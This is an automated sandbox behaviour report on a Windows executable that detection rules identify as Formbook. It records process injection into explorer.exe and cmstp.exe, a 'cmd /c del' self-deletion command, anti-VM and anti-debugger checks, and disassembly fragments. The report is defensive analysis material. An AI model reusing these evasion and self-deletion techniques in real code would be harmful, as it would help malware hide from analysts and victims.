          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: String function: 00A2B150 appears 45 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0467B150 appears 35 times
          Source: LWlcpDjYIQ.exe, 00000000.00000003.215702274.000000001EE2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220134452.0000000002260000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220083689.00000000007B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000002.00000002.256830286.0000000000CAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/10
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404201
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsmDEE2.tmpJump to behavior
          Source: LWlcpDjYIQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: LWlcpDjYIQ.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile read: C:\Users\user\Desktop\LWlcpDjYIQ.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'Jump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: cmstp.pdbGCTL source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: LWlcpDjYIQ.exe, 00000000.00000003.210847086.000000001ECE0000.00000004.00000001.sdmp, LWlcpDjYIQ.exe, 00000002.00000002.256684216.0000000000B1F000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: LWlcpDjYIQ.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeUnpacked PE file: 2.2.LWlcpDjYIQ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041535C push ebp; ret 2_2_0041535D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B3FB push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B45C push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00414EE8 push esi; ret 2_2_00414EE9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A7D0D1 push ecx; ret 2_2_00A7D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046CD0D1 push ecx; ret 7_2_046CD0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B3A5 push eax; ret 7_2_0285B3F8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B3F2 push eax; ret 7_2_0285B3F8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B3FB push eax; ret 7_2_0285B462
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285535C push ebp; ret 7_2_0285535D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02854EE8 push esi; ret 7_2_02854EE9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B45C push eax; ret 7_2_0285B462
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dllJump to dropped file
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000028485E4 second address: 00000000028485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 000000000284896E second address: 0000000002848974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Windows\explorer.exe TID: 4332Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5616Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_0040531D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405CB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.235733242.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.229986245.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000002.475804173.0000000001438000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.236039343.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.488038344.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.229143508.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00409B10 LdrLoadDll,2_2_00409B10
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_737F1000 Hyvkfcorf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_737F1000
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_0291160D mov eax, dword ptr fs:[00000030h]0_2_0291160D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_02911825 mov eax, dword ptr fs:[00000030h]0_2_02911825
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A690AF mov eax, dword ptr fs:[00000030h]2_2_00A690AF
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]2_2_00A5F0BF
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5F0BF mov eax, dword ptr fs:[00000030h]2_2_00A5F0BF
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5F0BF mov eax, dword ptr fs:[00000030h]2_2_00A5F0BF
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29080 mov eax, dword ptr fs:[00000030h]2_2_00A29080
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3884 mov eax, dword ptr fs:[00000030h]2_2_00AA3884
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3884 mov eax, dword ptr fs:[00000030h]2_2_00AA3884
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]2_2_00A240E1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]2_2_00A240E1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]2_2_00A240E1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A258EC mov eax, dword ptr fs:[00000030h]2_2_00A258EC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]2_2_00ABB8D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]2_2_00ABB8D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]2_2_00ABB8D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]2_2_00ABB8D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]2_2_00ABB8D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]2_2_00ABB8D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]2_2_00A5002D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]2_2_00A5002D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]2_2_00A5002D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]2_2_00A5002D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]2_2_00A5002D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]2_2_00A3B02A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]2_2_00A3B02A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]2_2_00A3B02A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]2_2_00A3B02A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF4015 mov eax, dword ptr fs:[00000030h]2_2_00AF4015
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF4015 mov eax, dword ptr fs:[00000030h]2_2_00AF4015
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]2_2_00AA7016
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]2_2_00AA7016
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]2_2_00AA7016
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF1074 mov eax, dword ptr fs:[00000030h]2_2_00AF1074
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE2073 mov eax, dword ptr fs:[00000030h]2_2_00AE2073
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A40050 mov eax, dword ptr fs:[00000030h]2_2_00A40050
